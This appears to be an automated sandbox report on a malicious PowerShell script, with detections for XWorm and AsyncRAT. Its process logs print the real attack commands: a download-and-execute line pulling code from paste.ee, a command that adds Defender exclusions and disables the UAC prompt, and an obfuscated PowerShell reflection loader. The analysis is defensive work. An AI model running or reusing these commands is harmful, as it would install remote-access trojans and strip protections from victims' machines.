Source: C:\Windows\System32\notepad.exe	Code function: 2_3_000001CB53D2CBB0	2_3_000001CB53D2CBB0
Source: C:\Windows\System32\notepad.exe	Code function: 2_3_000001CB53D33378	2_3_000001CB53D33378
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E62C04	2_2_000001CB53E62C04
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E6D7B0	2_2_000001CB53E6D7B0
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E73F78	2_2_000001CB53E73F78
Source: C:\Windows\System32\svchost.exe	Code function: 4_3_0000014F1CC82004	4_3_0000014F1CC82004
Source: C:\Windows\System32\svchost.exe	Code function: 4_3_0000014F1CC8CBB0	4_3_0000014F1CC8CBB0
Source: C:\Windows\System32\svchost.exe	Code function: 4_3_0000014F1CC93378	4_3_0000014F1CC93378
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_049CB4A0	5_2_049CB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_049CB490	5_2_049CB490
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_3_000001498BC12004	7_3_000001498BC12004
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_3_000001498BC1CBB0	7_3_000001498BC1CBB0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_3_000001498BC23378	7_3_000001498BC23378
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC42C04	7_2_000001498BC42C04
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC4D7B0	7_2_000001498BC4D7B0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC53F78	7_2_000001498BC53F78
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Code function: 9_2_00007FF66EEA1014	9_2_00007FF66EEA1014
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Code function: 9_2_00007FF66EEA1388	9_2_00007FF66EEA1388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C72DD68	17_2_00007FFC3C72DD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C72E339	17_2_00007FFC3C72E339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFC3C9A3F51	17_2_00007FFC3C9A3F51
Source: C:\Windows\System32\dllhost.exe	Code function: 20_3_000001EB42953378	20_3_000001EB42953378
Source: C:\Windows\System32\dllhost.exe	Code function: 20_3_000001EB4294CBB0	20_3_000001EB4294CBB0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_3_000001EB42942004	20_3_000001EB42942004
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140001CF0	20_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140002D4C	20_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140002434	20_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_00000001400031D0	20_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140001274	20_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB42983F78	20_2_000001EB42983F78
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB4297D7B0	20_2_000001EB4297D7B0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB42972C04	20_2_000001EB42972C04
Source: C:\Windows\System32\winlogon.exe	Code function: 21_3_0000018AF966CBB0	21_3_0000018AF966CBB0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_3_0000018AF9673378	21_3_0000018AF9673378
Source: C:\Windows\System32\winlogon.exe	Code function: 21_3_0000018AF9662004	21_3_0000018AF9662004
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF969D7B0	21_2_0000018AF969D7B0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF96A3F78	21_2_0000018AF96A3F78
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF9692C04	21_2_0000018AF9692C04
Source: C:\Windows\System32\lsass.exe	Code function: 22_3_000002D6CEB4CBB0	22_3_000002D6CEB4CBB0
Source: C:\Windows\System32\lsass.exe	Code function: 22_3_000002D6CEB42004	22_3_000002D6CEB42004
Source: C:\Windows\System32\lsass.exe	Code function: 22_3_000002D6CEB53378	22_3_000002D6CEB53378
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB7D7B0	22_2_000002D6CEB7D7B0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB72C04	22_2_000002D6CEB72C04
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB83F78	22_2_000002D6CEB83F78

Source: j3owB.exe.3.dr	Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64, for MS Windows
Source: cZp98.exe.3.dr	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: unknown

Process created: Commandline size = 5351

Source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 15.0.SVrB5SO0.exe.b00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000000.1281920599.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1350767206.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\ProgramData\SVrB5SO0.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SVrB5SO0.exe.3.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: SVrB5SO0.exe.3.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: SVrB5SO0.exe.3.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.31.dr	Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Security.evtx.31.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sysA
Source: System.evtx.31.dr	Binary string: C:\Device\HarddiskVolume3A
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.31.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: System.evtx.31.dr	Binary string: C:\Device\HarddiskVolume3ic0
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}d
Source: Microsoft-Windows-SMBServer%4Operational.evtx.31.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.31.dr	Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.31.dr	Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.31.dr	Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.31.dr	Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.31.dr	Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: System.evtx.31.dr	Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exed
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.31.dr	Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.31.dr	Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.31.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.31.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.31.dr	Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Security.evtx.31.dr	Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys32\
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.31.dr	Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683},
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.31.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.31.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe

Source: classification engine

Classification label: mal100.troj.evad.winPS1@22/85@6/6

Source: C:\ProgramData\j3owB.exe	Code function: 8_2_00F313E9 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	8_2_00F313E9
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Code function: 9_2_00007FF66EEA1014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,RtlFreeHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,	9_2_00007FF66EEA1014
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,	20_2_0000000140002D4C

Source: C:\ProgramData\j3owB.exe

Code function: 8_2_00F3161A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,

8_2_00F3161A

Source: C:\ProgramData\j3owB.exe

Code function: 8_2_00F3147C FindResourceA,SizeofResource,LoadResource,LockResource,

8_2_00F3147C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\ProgramData\SVrB5SO0.exe	Mutant created: \Sessions\1\BaseNamedObjects\3SQiK66LLWxWTFFs
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7500:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hphx0t01.dsk.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\script.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d \| iex"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\j3owB.exe "C:\ProgramData\j3owB.exe"
Source: C:\ProgramData\j3owB.exe	Process created: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe "C:\Users\user\AppData\Local\Temp\NwhPywLp.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\SVrB5SO0.exe "C:\ProgramData\SVrB5SO0.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\cZp98.exe "C:\ProgramData\cZp98.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KHaJDxumDNco{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IrkchjYcpcIHrG,[Parameter(Position=1)][Type]$FKynkUloVt)$wzaPjwDXVrR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e','Cl'+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$wzaPjwDXVrR.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e'+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IrkchjYcpcIHrG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$wzaPjwDXVrR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+'V'+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$FKynkUloVt,$IrkchjYcpcIHrG).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wzaPjwDXVrR.CreateType();}$ZLkQxZedqjGHd=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+'.'+''+'U'+'ns'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'ati'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$InAbAdJDZoirzm=$ZL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ad169925-81d9-44d9-bcaf-9afe899a1c33}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\j3owB.exe "C:\ProgramData\j3owB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\SVrB5SO0.exe "C:\ProgramData\SVrB5SO0.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\cZp98.exe "C:\ProgramData\cZp98.exe"	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Process created: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe "C:\Users\user\AppData\Local\Temp\NwhPywLp.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ad169925-81d9-44d9-bcaf-9afe899a1c33}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
